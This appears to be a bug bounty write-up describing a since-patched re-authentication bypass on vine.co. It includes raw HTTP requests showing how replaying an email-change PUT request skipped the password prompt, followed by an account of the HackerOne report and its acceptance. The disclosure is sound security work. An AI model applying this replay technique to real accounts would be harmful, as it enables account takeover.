Introduction

In 2014, I discovered a re-authentication bypass vulnerability on vine.co. This issue allowed an attacker to change an account’s email without requiring password re-authentication, bypassing an important security mechanism.

Background

While exploring Twitter, I noticed a tweet from @0xSobky mentioning an XSS vulnerability on Vine by changing the HTTP method. At the time, I had already been hunting for bugs on Vine but had found that most of the obvious vulnerabilities had been reported.

Despite the competitive landscape, I continued my testing, applying new techniques to uncover potential flaws. I had previously found and reported vulnerabilities to Twitter before they moved their bug bounty program to HackerOne, earning a place in their Hall of Fame.

twitter-xss

Discovery Process

I started testing CSRF, XSS, and IDOR attacks but quickly realized I needed to think outside the box. My focus shifted to changing the registered email address, a key action that should require authentication.

In the account settings page, I attempted to update my email from abdullah.test1@gmail.com to abdullah.test12@gmail.com.

twitter-xss

Clicking Save triggered a password re-authentication prompt.

twitter-xss

This was a new security feature that had not been present in my previous testing. I remembered suggesting to Twitter’s security team to implement re-authentication for email changes to prevent CSRF and XSS attacks.

Analyzing the Authentication Request

The re-authentication request looked like this:

POST /api/users/authenticate HTTP/1.1
Host: vine.co
User-Agent: Yours
Accept: application/json
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://vine.co/settings

action=change-email&username=abdullah.test1%40gmail.com&password=my-pAs*w0rd

This request did not include the new email address, which suggested that the email update was handled separately. Once the password was verified, the actual email change request was sent:

PUT /api/users/1190983260029763584 HTTP/1.1
Host: vine.co
User-Agent: Yours
Accept: application/json
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://vine.co/settings

email=abdullah.test12%40gmail.com

Identifying the Bypass

Comparing this request to other non-authenticated actions, such as updating the profile URL, I found something interesting:

PUT /api/users/1190983260029763584/vanity/hacker123 HTTP/1.1
Host: vine.co
User-Agent: Yours
Accept: application/json
X-Requested-With: XMLHttpRequest
Referer: https://vine.co/settings
Content-Length: 0

There were no additional authentication tokens required in either request. This raised the question: Could I replay the email change request without re-authentication?

Exploiting the Vulnerability

I logged out, logged back in, and attempted to replay the email change request:

PUT /api/users/1190983260029763584 HTTP/1.1
Host: vine.co
User-Agent: Yours
Accept: application/json
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://vine.co/settings

email=abdullah.hacker%40gmail.com

Response:

HTTP/1.1 200 OK
Content-Type: application/json

{"code": "", "data": {}, "success": true, "error": ""}

The request successfully updated the email without requiring re-authentication!

Although this exploit required access to the victim’s session or cookies, it still bypassed a key security measure intended to protect users from account takeovers.

Reporting to Twitter

I documented my findings and submitted a report via HackerOne. The initial response was promising:

twitter-xss

However, two days later, I received a follow-up message stating that my report was not valid due to its irrelevance to Twitter’s iOS security model:

twitter-xss

I knew this reasoning was incorrect, as my report was about Vine’s web security, not iOS. Instead of arguing aggressively, I wrote a polite but firm response, explaining:

  • The vulnerability was on vine.co, not the iOS app.
  • Security should be consistent across platforms.
  • The feature was implemented for security reasons, and I successfully bypassed it.

Shortly after, Twitter reconsidered and accepted my report:

twitter-xss

Conclusion

This bug demonstrates the importance of:

  • Testing new security features for potential bypasses.
  • Re-authenticating users for critical actions like email changes.
  • Ensuring security is consistent across all platforms.

Twitter eventually patched the issue two years later, but the lesson remains:

Always think outside the box when hunting for vulnerabilities.

If you enjoyed this write-up or have any questions, feel free to reach out on Twitter: @Abdulahhusam.